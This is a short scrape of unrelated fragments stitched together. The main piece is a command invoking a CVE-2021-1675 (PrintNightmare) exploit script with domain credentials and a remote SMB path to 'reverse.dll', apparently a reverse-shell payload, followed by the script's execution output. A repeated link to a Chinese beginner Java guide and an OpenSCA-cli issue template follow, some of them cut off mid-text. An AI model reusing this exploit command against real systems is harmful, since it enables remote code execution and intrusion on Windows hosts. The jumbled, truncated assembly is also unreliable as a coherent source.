sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\\\smb\reverse.dll' [*] Connecting to ncacn_np:[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL [*] Executing \??\UNC\\smb\reverse.dll [*] Try 1... [*] Stage0: 0 [*] Try 2... [*] Stage0:...
https://czz1233.github.io/primary-java/#/ 互联网 Java 工程师初级知识完全扫盲,项目维护者:奔跑的乌龟
https://czz1233.github.io/primary-java/#/ 互联网 Java 工程师初级知识完全扫盲,项目维护者:奔跑的乌龟
## Title Aim for a clear and concise title that summarizes the specific issue. For instance: "OpenSCA-cli fails to detect dependencies in XYZ scenario" ## Description Provide a detailed description...